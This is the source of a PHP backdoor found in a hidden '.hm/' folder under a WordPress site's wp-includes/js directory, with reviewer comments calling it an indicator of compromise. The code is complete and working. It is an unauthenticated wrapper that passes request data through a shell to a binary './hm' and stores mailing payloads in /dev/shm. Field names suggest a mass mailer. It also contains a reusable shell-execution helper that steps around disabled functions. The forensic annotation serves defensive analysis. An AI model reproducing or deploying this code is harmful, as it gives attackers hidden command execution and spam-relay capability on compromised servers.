/home/jambtst2015/public_html/cccng.org/wp-includes/js/.hm/hmw.php
<?php
// NOTE(review): this is not application code. Read end to end, the file is an
// unauthenticated, web-reachable wrapper that hands the HTTP request to a
// sibling binary (`./hm`, see the command built at the bottom) through a
// shell. Nothing in the file checks a session, token, password or source
// address. Together with its location in the listing (a hidden `.hm/`
// directory under wp-includes/js/, where WordPress core keeps no PHP of its
// own) it should be treated as an indicator of compromise: preserve a copy
// and the sibling files for forensics, then remove the directory and rotate
// the site's credentials. The comments below describe what the code does so
// an analyst can read it quickly; they are not a fix.
//
// Drops every header PHP has queued so far (e.g. X-Powered-By where
// expose_php is on), so the response carries only what the child emits.
header_remove();
// Step 1: re-serialise the GET parameters into the process environment as
// QUERY_STRING. The child inherits the environment, so attacker-controlled
// query data reaches it unvalidated, CGI-style.
$env_query_string = http_build_query($_GET);
putenv("QUERY_STRING=$env_query_string");
// Holders for the request body rebuilt below; CONTENT_TYPE and
// CONTENT_LENGTH are exported the same way once the body exists.
$multipart_body = '';
$content_length = 0;
$content_type = '';
// Shell-execution helper of the kind found in many PHP web shells. Runs $in
// through whichever execution primitive the host still exposes -- exec,
// passthru, system, shell_exec, then popen, in that order -- and returns the
// command's stdout as a string ('' when no primitive is available or nothing
// was produced; the shell_exec branch can also hand back null). The `@`
// prefixes hide the warning PHP raises if a chosen function turns out to be
// disabled, so a partial disable_functions list is stepped around silently.
// $in reaches the shell verbatim: no escaping happens here. The single
// caller below builds the command from a server-generated hex filename, not
// from request data.
function wEx($in) {
$out = '';
if (function_exists('exec')) {
// exec() fills $out with one array element per output line; rejoin them.
@exec($in, $out);
$out = @join("\n", $out);
} elseif (function_exists('passthru')) {
// passthru() and system() write straight to the output buffer; capture it.
ob_start();
@passthru($in);
$out = ob_get_clean();
} elseif (function_exists('system')) {
ob_start();
@system($in);
$out = ob_get_clean();
} elseif (function_exists('shell_exec')) {
$out = shell_exec($in);
} elseif (is_resource($f = @popen($in, "r"))) {
// Last resort. The popen() call is the condition itself, so the process is
// already running when this branch is entered. Read to EOF in 1 KiB chunks;
// fread() is not silenced, so a read error can surface as a warning in the
// response body.
$out = "";
while (!@feof($f))
$out .= fread($f, 1024);
pclose($f);
}
return $out;
}
// Step 2: for a POST with a non-empty decoded body, rebuild the fields as a
// multipart/form-data document for the child. The child never sees the
// original wire format -- only this reconstruction plus the CGI-style
// environment variables.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && !empty($_POST)) {
// Boundary derived from the clock (same value within a second); it is only a
// framing delimiter here, not a secret.
$boundary = '----WebKitFormBoundary' . md5(time());
// Exported so the child parses stdin as multipart with this boundary.
$content_type = "multipart/form-data;boundary=" . $boundary;
putenv("CONTENT_TYPE=$content_type");
$multipart_body = '';
// ?store with no bid: persist the whole POST to RAM-backed /dev/shm, keyed by
// the MD5 of its JSON, and print that key as a handle for later requests.
// Storing does not short-circuit anything -- execution continues below with
// the original $_POST. Nothing in this file ever deletes these files, so on a
// live host /dev/shm/<32 hex>.txt is where the stored payloads (message
// templates, by the look of the field names) can be recovered.
if(isset($_GET['store']) && !isset($_GET["bid"])){
$postJson = json_encode($_POST);
file_put_contents("/dev/shm/".md5($postJson).".txt", $postJson);
echo md5($postJson)."<br />";
// ?store&bid=<key>: reload a stored POST and overlay four fields from the
// current request. bid is spliced into the path with no validation: it is not
// restricted to hex and `../` is not rejected, so any readable file whose
// name ends in .txt can be opened here (only its json_decode result is used,
// so the content is not echoed back). The four $_POST reads are unguarded
// and raise undefined-index notices when absent; if the file is not valid
// JSON, json_decode yields null and the assignments build a fresh array.
}elseif(isset($_GET['store']) && file_exists("/dev/shm/".$_GET["bid"].".txt")){
$jsonCode = file_get_contents("/dev/shm/".$_GET["bid"].".txt");
$postData = json_decode($jsonCode, true);
$postData["smtp_from_email"] = $_POST["smtp_from_email"];
$postData["from_email"] = $_POST["from_email"];
$postData["maillist"] = $_POST["maillist"];
$postData["list"] = $_POST["list"];
$_POST = $postData;
// ?store with a bid that does not resolve: the only path that refuses to run
// the child.
}elseif(isset($_GET['store']) && isset($_GET["bid"])){
echo "failed to load message data";
exit;
}
// Serialise every field as one multipart part. With ?encode the field names
// arrive base64-encoded (presumably to avoid keyword-based filtering -- an
// inference, not something this file shows). $name is interpolated into the
// Content-Disposition header unescaped, so a name containing a quote or CRLF
// rewrites that part's headers; $value is appended as-is.
foreach ($_POST as $name => $value) {
if(isset($_GET['encode'])){
$name = base64_decode($name);
}
$multipart_body .= "--" . $boundary . "\r\n";
$multipart_body .= "Content-Disposition: form-data; name=\"" . $name . "\"\r\n\r\n";
$multipart_body .= $value . "\r\n";
}
// Closing boundary, then the byte length exported as CONTENT_LENGTH.
$multipart_body .= "--" . $boundary . "--\r\n";
$content_length = strlen($multipart_body);
putenv("CONTENT_LENGTH=$content_length");
}
// Step 3: base64 the rebuilt body and spool it to a file so it can be piped
// through the shell without quoting concerns. On a GET the body is empty, so
// a zero-length file is written and the child runs with empty stdin.
$encoded_body = base64_encode($multipart_body);
// Step 4: the name is not random (the original comment was wrong): it is the
// MD5 of the encoded body. Two concurrent requests with identical bodies
// share one file, and whichever finishes first unlinks it under the other.
// Because the name is server-generated hex, the command below cannot be
// injected through it.
$random_filename = '/dev/shm/' . md5($encoded_body) . '.txt';
file_put_contents($random_filename, $encoded_body);
// Step 5: the child is `./hm`, resolved relative to the working directory
// (normally the script's own hidden .hm/ directory when run by the web
// server), with `hma.htnl` as its only argument -- a template name by the
// look of it, not verifiable here. It gets the decoded multipart body on
// stdin and QUERY_STRING / CONTENT_TYPE / CONTENT_LENGTH from the
// environment, i.e. it is driven like a CGI program. What `hm` actually is
// cannot be determined from this file; recover and analyse the binary
// alongside this script.
$command = "cat $random_filename | base64 -d | ./hm hma.htnl";
// Step 6: run it via wEx (not system(), as the old comment said) and relay
// its output verbatim after stripping every literal "Content-type: text/html"
// -- consistent with the child printing a CGI-style header line (inferred
// from this replacement, not confirmed). The child's exit status is never
// checked or reported.
echo str_replace("Content-type: text/html", "", wEx($command));
// Step 7: delete the spool file. The ?store payloads written earlier are not
// cleaned up anywhere in this file.
unlink($random_filename);
?>